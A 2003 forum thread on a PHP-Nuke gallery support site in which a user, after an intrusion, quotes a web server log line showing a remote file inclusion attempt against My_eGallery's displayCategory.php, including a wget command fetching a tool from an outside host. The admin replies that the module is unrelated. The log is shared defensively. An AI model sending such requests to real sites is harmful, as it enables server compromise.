| Author |
Message |
CodEZ
Beginner


Joined: Sep 22, 2003 Posts: 12
|
Posted: Wed Dec 31, 2003 3:36 pm Post subject: (possible) Security Vulnerability |
|
|
I was hacked (hi my name is charlie and i didn't patch) somewhat -- there was an "invaider" account in my admin group... turns out a lot of ppl go hit by the same person... anyways i read my logs for today and found this (not the source of the above hack):
203.130.195.89 - - [30/Dec/2003:04:59:56 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/kamar_n0ldy/badboy/inject.txt?&cmd=wget%20sikat.batcave.net/tool/4000 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; FunWebProducts)"
It appears as though someone was trying to use an exploit through Nuked Gallery -- thankfully it wasn't a success... but just wanted to post anyways |
|
| Back to top |
|
|
AdBot
|
| Post subject: (possible) Security Vulnerability |
|
|
|
|
|
| Back to top |
|
 |
dari
Site Admin


Joined: Mar 03, 2003 Posts: 6287 Location: Washington Township, NJ, USA
|
Posted: Wed Dec 31, 2003 4:19 pm Post subject: Re: (possible) Security Vulnerability |
|
|
time for some clarification...NukedGallery is NOT a software package. It is just the name of this site which support integration of Menalto Gallery within PHPNuke (and eventually PostNuke).
Your issue w/ My_eGallery, while good to know, is irrelevant to this site and (most of) it's users. My_eGallery is NOT the same as Menalto Gallery. |
|
| Back to top |
|
|
CodEZ
Beginner


Joined: Sep 22, 2003 Posts: 12
|
Posted: Wed Dec 31, 2003 4:58 pm Post subject: Re: (possible) Security Vulnerability |
|
|
ohhhh ya... ha my bad... i was so freaked out earlier that I forgot
 |
|
| Back to top |
|
|
dari
Site Admin


Joined: Mar 03, 2003 Posts: 6287 Location: Washington Township, NJ, USA
|
Posted: Wed Dec 31, 2003 9:57 pm Post subject: Re: (possible) Security Vulnerability |
|
|
no worries...you might want to check out nukecops and see if they have anything like this listed (maybe w/ a fix)...
happy new year  |
|
| Back to top |
|
|
|
|
|
|
|